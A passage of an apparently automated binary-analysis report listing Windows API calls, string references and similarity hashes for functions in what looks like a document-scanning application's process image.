                                                                                                  • Part of subcall function 0047CF00: InterlockedIncrement.KERNEL32(00000000), ref: 0047D00A
                                                                                                  • Part of subcall function 0047CF00: InterlockedDecrement.KERNEL32(?), ref: 0047D015
                                                                                                  • Part of subcall function 0047CF00: InterlockedDecrement.KERNEL32(?), ref: 0047D038
                                                                                                  • Part of subcall function 0047CF00: InterlockedDecrement.KERNEL32(?), ref: 0047D054
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004141CA
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004141E0
                                                                                                  • Part of subcall function 00413DD0: InterlockedDecrement.KERNEL32(?), ref: 00413EA3
                                                                                                  • Part of subcall function 00413DD0: InterlockedIncrement.KERNEL32(?), ref: 00413EDF
                                                                                                  • Part of subcall function 00413DD0: InterlockedDecrement.KERNEL32(?), ref: 00413EE4
                                                                                                • TlsGetValue.KERNEL32(00530380), ref: 004142B9
                                                                                                • InterlockedIncrement.KERNEL32(-00000005), ref: 00414310
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0041436C
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00414388
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$Value
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 2093565574-2738134327
                                                                                                • Opcode ID: 0081a4ee8f054fca861c8c96425134f54fd15ed104294e87ffd388237323a83a
                                                                                                • Instruction ID: 5bbe4318afd41ba014c8752ac1285e0feb84d069cb9d6c601fee45891c812db8
                                                                                                • Opcode Fuzzy Hash: 0081a4ee8f054fca861c8c96425134f54fd15ed104294e87ffd388237323a83a
                                                                                                • Instruction Fuzzy Hash: 5E81BF71A00209DFCB11DFA8C841BEEBBF5BF94304F14416EE815A7381D779AA85CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 0044830A
                                                                                                • GetLastError.KERNEL32 ref: 00448314
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00448354
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?), ref: 0044836A
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004483AF
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004483F1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Module$CountEnterErrorFileHandleInitializeLastLeaveNameSpin
                                                                                                • String ID: Module$Module_Raw$REGISTRY
                                                                                                • API String ID: 4130488056-549000027
                                                                                                • Opcode ID: 8bd06c7f2ad8c506cdbf9361ab91023f70c13a52a79e20d971c5bf0f5b019fa3
                                                                                                • Instruction ID: f657fc00d79775702216838b886e9da4597242cc157e02c1e69ae64cc91755f5
                                                                                                • Opcode Fuzzy Hash: 8bd06c7f2ad8c506cdbf9361ab91023f70c13a52a79e20d971c5bf0f5b019fa3
                                                                                                • Instruction Fuzzy Hash: 13519F72D00629ABEB20DF94CC40BAFB778BB44714F14426EED15B7280EB799E44CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004173CA
                                                                                                • InterlockedIncrement.KERNEL32(00417580), ref: 004173EF
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00417407
                                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 00417432
                                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 0041747C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalIncrementInitializeInterlockedSection$CurrentThread
                                                                                                • String ID: ..\Shared\ScanEngine.cpp$@fO$@fO$HfO
                                                                                                • API String ID: 905048771-2890377940
                                                                                                • Opcode ID: 6e581f659f6f1fb1ebb56370f9fa79d93996636c046e13958e932195a4dad500
                                                                                                • Instruction ID: a6ca4ebeff03b113dc421f1eb5a1374e20c18cc236641f02d83ab3de2c68de0b
                                                                                                • Opcode Fuzzy Hash: 6e581f659f6f1fb1ebb56370f9fa79d93996636c046e13958e932195a4dad500
                                                                                                • Instruction Fuzzy Hash: AE611BB0901348DFEB15CF58C59879ABFE4AF05308F14C59AE9449F392C3B9DA08CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SelectObject.GDI32(?,?), ref: 0045A1FB
                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 0045A241
                                                                                                • TextOutW.GDI32(?,00000000,00000000,?,00000001), ref: 0045A280
                                                                                                • SelectObject.GDI32(?,?), ref: 0045A323
                                                                                                  • Part of subcall function 0044B780: GetTextExtentPoint32W.GDI32(?,00000006,00000000,000000FF), ref: 0044B7A0
                                                                                                  • Part of subcall function 0044B780: GetLastError.KERNEL32 ref: 0044B7AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Text$ObjectSelect$ErrorExtentLastMetricsPoint32
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\fontlinkingawl.cpp$"E
                                                                                                • API String ID: 1522327509-2630117962
                                                                                                • Opcode ID: 77393543cb6c5bdfa050e3105d35f3c8001315cc99447f5cb6fb68500d6b31f8
                                                                                                • Instruction ID: e5d19b415266e60ebbab3757a2990ae27252f804b6ec03277d9c716031826fc7
                                                                                                • Opcode Fuzzy Hash: 77393543cb6c5bdfa050e3105d35f3c8001315cc99447f5cb6fb68500d6b31f8
                                                                                                • Instruction Fuzzy Hash: 21416A75900708EFDB14CF84C946BAEBBB5FF88710F10811EE906A7391C779A950CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004201B4
                                                                                                • InterlockedIncrement.KERNEL32(-00000007), ref: 004201D3
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004201EF
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00420240
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: @fO$@fO$HfO$WiaDataSource.cpp$|O
                                                                                                • API String ID: 3508698243-2945901998
                                                                                                • Opcode ID: 7d65903571b7e4049c3f9e1465e3f055422f26bb9a585e2298f87fd64ed962e0
                                                                                                • Instruction ID: edf9057650f6709e917b262f07ccc9b95e354526a9d41eba7a9eca0504626cd1
                                                                                                • Opcode Fuzzy Hash: 7d65903571b7e4049c3f9e1465e3f055422f26bb9a585e2298f87fd64ed962e0
                                                                                                • Instruction Fuzzy Hash: 50418EB0600748DFD720CF59C949B5BBBF4FB04704F10858EE4599B791D3B9E9048B98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$LongMenu
                                                                                                • String ID: 8cC$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$hYS
                                                                                                • API String ID: 3514192615-2075037915
                                                                                                • Opcode ID: 9741de5ba1cd65d25d31c385686cf3c6902a512f401259281cb9dcfc4bed18d3
                                                                                                • Instruction ID: e5e3e71249c6adbefe45841ba96f4924cc95bf9fc48744adb56a4aa4983d986d
                                                                                                • Opcode Fuzzy Hash: 9741de5ba1cd65d25d31c385686cf3c6902a512f401259281cb9dcfc4bed18d3
                                                                                                • Instruction Fuzzy Hash: 2921FB71B407156BDB20AB548D06B2B7794EB48B14F02526FF815E77C1EFB9D810CA49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045B080
                                                                                                • SendMessageW.USER32(?,00000432,00000000,?), ref: 0045B0EC
                                                                                                • GetLastError.KERNEL32 ref: 0045B0F6
                                                                                                Strings
                                                                                                • @fO, xrefs: 0045B0D2
                                                                                                • @fO, xrefs: 0045B09B
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\tooltipctrlawl.h, xrefs: 0045B091, 0045B118
                                                                                                • ::SendMessage(Handle(), TTM_ADDTOOL, 0, reinterpret_cast<LPARAM>(&toolInfo)) != 0, xrefs: 0045B11D
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\tooltipctrlawl.cpp, xrefs: 0045B0C8
                                                                                                • AWL::CToolTipCtrl::AddTool, xrefs: 0045B122
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLastMessageSendWindow
                                                                                                • String ID: ::SendMessage(Handle(), TTM_ADDTOOL, 0, reinterpret_cast<LPARAM>(&toolInfo)) != 0$@fO$@fO$AWL::CToolTipCtrl::AddTool$d:\build\teamagent\_work\1\s\0\awl\inc\tooltipctrlawl.h$d:\build\teamagent\_work\1\s\0\awl\src\tooltipctrlawl.cpp
                                                                                                • API String ID: 3745114989-3846812953
                                                                                                • Opcode ID: 04face1da4562f168175a402ad0bcd2554a8d4730061d42b69eb961cd8dabae8
                                                                                                • Instruction ID: 82dada191719ee228f9b0afd5fd846c746fe87dc4de3fb61c49c2e2c100898f6
                                                                                                • Opcode Fuzzy Hash: 04face1da4562f168175a402ad0bcd2554a8d4730061d42b69eb961cd8dabae8
                                                                                                • Instruction Fuzzy Hash: 4311DD31B4070027E7742A249C13B3B2255EBA0F43F94842BFE51EA6C3F7A9DC5586AC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00442090
                                                                                                • EnableWindow.USER32(?,00000001), ref: 004420A2
                                                                                                • GetActiveWindow.USER32 ref: 004420B6
                                                                                                • IsWindowVisible.USER32 ref: 004420C4
                                                                                                • SetForegroundWindow.USER32(?,?,00000000,?,?,0042C3E2,00000000,00000000), ref: 004420D1
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00442114
                                                                                                • SetCursor.USER32(00000000,?,00000000,?,?,0042C3E2,00000000,00000000), ref: 0044211B
                                                                                                Strings
                                                                                                • @fO, xrefs: 004420ED
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\modalstateawl.cpp, xrefs: 004420E3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Cursor$ActiveEnableForegroundLoadVisible
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\modalstateawl.cpp
                                                                                                • API String ID: 1400960416-1119879059
                                                                                                • Opcode ID: 2239d0c89b95a2e6cfacc9bee856d1490bc6621a23f019197ab6ac537c43101f
                                                                                                • Instruction ID: ee82d81ede4e9883eedb0d74f8a0941c17eb60a4135f3bf7cc8e0f634ba4b92a
                                                                                                • Opcode Fuzzy Hash: 2239d0c89b95a2e6cfacc9bee856d1490bc6621a23f019197ab6ac537c43101f
                                                                                                • Instruction Fuzzy Hash: 3C21AC30601601ABE7319F15DD49B37B7E4EF80702F80842EF646976A1CBB8E851CF58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0042B1FE
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042B20C
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0042B22F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042B239
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalDecrementIncrementSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$Wia\WiaTransferCallback.cpp$xMS$xMS
                                                                                                • API String ID: 3615492109-1834591149
                                                                                                • Opcode ID: 471d70ad7bc586b2b9137a0a79e356f2118cb77407346013a8efff0a52c345b4
                                                                                                • Instruction ID: 7bcedcabdbefc26340e3552c7d67d91397430438c88032e4eba1213c1d612334
                                                                                                • Opcode Fuzzy Hash: 471d70ad7bc586b2b9137a0a79e356f2118cb77407346013a8efff0a52c345b4
                                                                                                • Instruction Fuzzy Hash: CF219075300214AFD710AF29DC46F2BBBA5FB48711F40456AB944DB292E7B5EC20CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0043E207
                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,0042B73B,?,?,?,00000000,004DEAB5,000000FF,?,00417493), ref: 0043E20E
                                                                                                • SetWinEventHook.USER32 ref: 0043E226
                                                                                                  • Part of subcall function 00482A90: OutputDebugStringW.KERNEL32(?,?,00000002,00000002,?), ref: 00482B62
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0043E242
                                                                                                • SetWindowsHookExW.USER32(0000000C,0043E130,00000000,00000000), ref: 0043E252
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • Awl Warning: Cannot set WinEvent FocusHook. Using Windows FocusHook., xrefs: 0043E235
                                                                                                • @fO, xrefs: 0043E26E
                                                                                                • Awl Warning: Cannot set Windows FocusHook. GetActiveChild returns 0., xrefs: 0043E286
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\focushookawl.cpp, xrefs: 0043E264
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Current$CriticalHookSectionThreadValue$DebugEnterEventException@8LeaveOutputProcessStringThrowWindows
                                                                                                • String ID: @fO$Awl Warning: Cannot set WinEvent FocusHook. Using Windows FocusHook.$Awl Warning: Cannot set Windows FocusHook. GetActiveChild returns 0.$d:\build\teamagent\_work\1\s\0\awl\src\focushookawl.cpp
                                                                                                • API String ID: 1976872971-3551911399
                                                                                                • Opcode ID: a0c08f9522d25334f9572098e6ee414338754e91d6d5e3203dceb72ee820a3e1
                                                                                                • Instruction ID: c4145c490f69ea34e8538e2fc6237a90f7a2009d73f831e20d80e0f842fa518e
                                                                                                • Opcode Fuzzy Hash: a0c08f9522d25334f9572098e6ee414338754e91d6d5e3203dceb72ee820a3e1
                                                                                                • Instruction Fuzzy Hash: 150167B1A803016FE7242765BD0AF3B3AA8A754705F10153AF745D52D1E7B891548E1D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(00000004), ref: 0042518C
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004251A1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004251B3
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004251C5
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 0040C690: InterlockedDecrement.KERNEL32(?), ref: 0040C6AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalIncrementSection$Value$DecrementEnterException@8InitializeLeaveThrow
                                                                                                • String ID: @fO$@fO$Wia\Wia2Item.cpp$no paper in feeder
                                                                                                • API String ID: 910236911-2634407114
                                                                                                • Opcode ID: 3af7ad9bc0c31711e39ce86f6ae009583b2cf16c4fe24f2aaac3bc34c7181d2e
                                                                                                • Instruction ID: bad0a06a5deec3fad8a61914ca03e49cff9dd6addd9a80f1eba9eb121d5d6d3a
                                                                                                • Opcode Fuzzy Hash: 3af7ad9bc0c31711e39ce86f6ae009583b2cf16c4fe24f2aaac3bc34c7181d2e
                                                                                                • Instruction Fuzzy Hash: 3951A330A00348EFDB10DFA4C949BAEBBB4EF55314F20859EE445AB3C1D7B99A04CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(?,00530274), ref: 0047B420
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 0047B43E
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047B450
                                                                                                • InterlockedDecrement.KERNEL32(0047B5EE), ref: 0047B4A4
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047B4C9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$IncrementValue$Decrement
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 3938972598-2738134327
                                                                                                • Opcode ID: 67d6f3441c1a37f26c4209646f8bb206176a5820bee8f58b09ba624e2fb941d9
                                                                                                • Instruction ID: 01eaa76e7e33e70cd140eecaf9014de1da4f818ce91c017302fd1f843041e8a9
                                                                                                • Opcode Fuzzy Hash: 67d6f3441c1a37f26c4209646f8bb206176a5820bee8f58b09ba624e2fb941d9
                                                                                                • Instruction Fuzzy Hash: 2541AA75900605AFCB009FA8CC09BEFBBB8FF45704F148459E901A7352CB79AE01CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00478137
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0047816E
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00478184
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004781F3
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00478205
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00478222
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 4289621856-1285152028
                                                                                                • Opcode ID: 2bd56d6de325430113b84e94f560d660bb340a46dce09ec8c6517d36fbe82322
                                                                                                • Instruction ID: 9fd8bbecab1529a69c7e225c1da930418db34d2b5df15f021c8a4afdb3c641b4
                                                                                                • Opcode Fuzzy Hash: 2bd56d6de325430113b84e94f560d660bb340a46dce09ec8c6517d36fbe82322
                                                                                                • Instruction Fuzzy Hash: C0417F71940705DFDB11DF99CC89BAEBBB4FF04705F0085AEE80993681D7795A04CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00478287
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 004782BE
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004782DA
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047833F
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00478351
                                                                                                • InterlockedDecrement.KERNEL32(0047740D), ref: 0047836E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 4289621856-1285152028
                                                                                                • Opcode ID: 9d1bbe49bc92e9d111ea381d26132e04423c0dbba9044b5b93367677009a0277
                                                                                                • Instruction ID: a3f17dffe4b80215ac5b0304fef66495e44f8ec9a633ed1baec9272d34fac4a6
                                                                                                • Opcode Fuzzy Hash: 9d1bbe49bc92e9d111ea381d26132e04423c0dbba9044b5b93367677009a0277
                                                                                                • Instruction Fuzzy Hash: FB41D371A00705AFD710DF99CC45BAEBBB4FF44704F1085ADE809A7381D7B96904CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004783D7
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0047840E
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047842A
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047848F
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004784A1
                                                                                                • InterlockedDecrement.KERNEL32(004773FC), ref: 004784BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
